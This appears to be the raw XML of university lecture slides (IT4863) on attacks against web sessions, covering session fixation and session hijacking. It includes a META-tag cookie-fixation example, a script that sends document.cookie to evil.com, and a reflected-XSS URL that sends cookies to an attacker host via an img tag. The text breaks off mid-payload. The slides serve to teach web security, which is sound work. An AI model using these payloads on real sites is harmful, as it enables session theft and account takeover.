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3" r:id="rId3"/>
    <p:sldId id="325" r:id="rId4"/>
    <p:sldId id="289" r:id="rId5"/>
    <p:sldId id="312" r:id="rId6"/>
    <p:sldId id="337" r:id="rId7"/>
    <p:sldId id="313" r:id="rId8"/>
    <p:sldId id="314" r:id="rId9"/>
    <p:sldId id="315" r:id="rId10"/>
    <p:sldId id="326" r:id="rId11"/>
    <p:sldId id="327" r:id="rId12"/>
    <p:sldId id="316" r:id="rId13"/>
    <p:sldId id="317" r:id="rId14"/>
    <p:sldId id="318" r:id="rId15"/>
    <p:sldId id="338" r:id="rId16"/>
    <p:sldId id="320" r:id="rId17"/>
    <p:sldId id="321" r:id="rId18"/>
    <p:sldId id="322" r:id="rId19"/>
    <p:sldId id="323" r:id="rId20"/>
    <p:sldId id="328" r:id="rId21"/>
    <p:sldId id="329" r:id="rId22"/>
    <p:sldId id="330" r:id="rId23"/>
    <p:sldId id="331" r:id="rId24"/>
    <p:sldId id="332" r:id="rId25"/>
    <p:sldId id="334" r:id="rId26"/>
    <p:sldId id="336" r:id="rId27"/>
    <p:sldId id="31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94" d="100"/>
          <a:sy n="94" d="100"/>
        </p:scale>
        <p:origin x="1133"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4F21F2-F979-4719-BC46-90578C1DD75F}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>6/30/2019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5F5DE3-8A11-4EE6-9BA2-D34CD58641CC}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3715102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2</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="825080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3</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4196290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extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="309904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6/30/2019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www.kennesaw-web.com/"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z2.www.page.com/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://z1.www.page.com/" TargetMode="External"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout12.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://z3.www.page.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1470025"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>IT4863</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="623709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Threats on established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Hackers </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Intend to steal or alter web sessions </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Perform unauthorized activities without the knowledge of victims based on valid session id</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3721966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1066800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr" eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>Some example attacks on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endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Attack techniques on web sessions </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Session fixation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Session stealing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>Cross protocol attack</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="452056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381000" y="1143000"/>
            <a:ext cx="8153400" cy="4953000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An attacker first establishes a connection with a web server that he/she is trying to gain illegitimate access to</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>After the connection is made, a session ID is assigned to the attacker, or a session ID is created by the attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Once the attacker has the legitimate session ID in hand, he sends the session ID to a victim</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Two ways of sending this to the victim</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>URL link</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A URL is usually sent to the victim by phishing email</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Since a victim is using the created session ID, the server is tricked into thinking the session is legitimate and does not create a new ID</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This allows the attacker to gain full access to the victim’s information and account at a later time</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="195990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fixation</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="762000" y="1066800"/>
            <a:ext cx="8153400" cy="3429000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>HTML META tag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: By using popular phishing techniques, an attacker can send a victim a page containing the META tag.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The META tag forces an application to set a fixed session ID through cookie. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In the example below, the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>Set-Cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> stores </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>predefined session ID (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>PHPSESSID=iek38i9d89</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>victim’s website URL (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>http://www.xyz.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Expiry date (Saturday, 15-June-13 08:20:00 GMT) for the cookie. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="6" name="Table 5"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1502271186"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="838200" y="4876800"/>
          <a:ext cx="7924800" cy="740404"/>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740404">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="just">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>&lt;meta http-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>equiv</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>="Set-Cookie" content= “</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>PHPSESSID=iek38i9d89</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>; </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2800" dirty="0">
                        <a:effectLst/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="just">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>      path=</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>http://www.xyz.com</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1800" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>; expires=Saturday, 15-June-13 08:20:00 GMT”&gt;</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="28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2"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="762000" y="5764803"/>
            <a:ext cx="6934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1pPr>
            <a:lvl2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2pPr>
            <a:lvl3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3pPr>
            <a:lvl4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4pPr>
            <a:lvl5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5pPr>
            <a:lvl6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6pPr>
            <a:lvl7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7pPr>
            <a:lvl8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8pPr>
            <a:lvl9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kumimoji="0" lang="en-US" altLang="en-US" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Calibri" pitchFamily="34" charset="0"/>
                <a:ea typeface="Times New Roman" pitchFamily="18" charset="0"/>
                <a:cs typeface="Vrinda" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>An example of cookie setting using META tag.</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66433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609600" y="1066800"/>
            <a:ext cx="8153400" cy="3429000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Stored web session at the browser can be stolen from a victim’s machine by malicious JavaScript code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The example JavaScript code retrieves the information and then sends the information to an attacker controlled website (evil.com). </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The JavaScript code can be sent to a victim just by phishing web page or email having a URL with the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> code</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="8" name="Table 7"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="57732542"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="838200" y="4876800"/>
          <a:ext cx="7924800" cy="680466"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" firstCol="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="7924800">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="457200">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="0" marR="0" algn="just">
                        <a:lnSpc>
                          <a:spcPct val="115000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>&lt;script&gt;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>javascript:window.open</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>(‘http://www.evil.com/q=’+ </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>document.cookie</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" dirty="0">
                          <a:effectLst/>
                        </a:rPr>
                        <a:t>);&lt;/script&gt; </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="32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600200" y="5715000"/>
            <a:ext cx="5413612" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>An example of cookie stealing by JavaScript code</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1843561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rmAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Session stealing (hijacking)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="3048000"/>
            <a:ext cx="8305800" cy="2895600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The link allows users to search a database for a given </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>keyword (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>j</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If a victim clicks the link, a GET request will be sent to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>http://vulnerableWebsite.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The object </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>j </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>will be included into the response page. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In addition, an image URI is created that contains all values of the victims cookie which is sent to the attacker</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="8" name="Table 7"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2059204168"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="457200" y="1219200"/>
          <a:ext cx="8287603" cy="914400"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" firstCol="1" bandRow="1">
                <a:tableStyleId>{5C22544A-7EE6-4342-B048-85BDC9FD1C3A}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="8287603">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="457200">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>http:// vulnerableWebsite.com/</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>search.php?</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="FF0000"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>j</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>=&lt;/u&gt;&lt; script &gt; </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>document.write</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="lt1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRPr>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>(‘&lt;</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>img</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>src</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t> ="http:// </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="1200" baseline="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:schemeClr val="lt1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>IAMahacker</a:t>
                      </a:r>
                      <a:r>
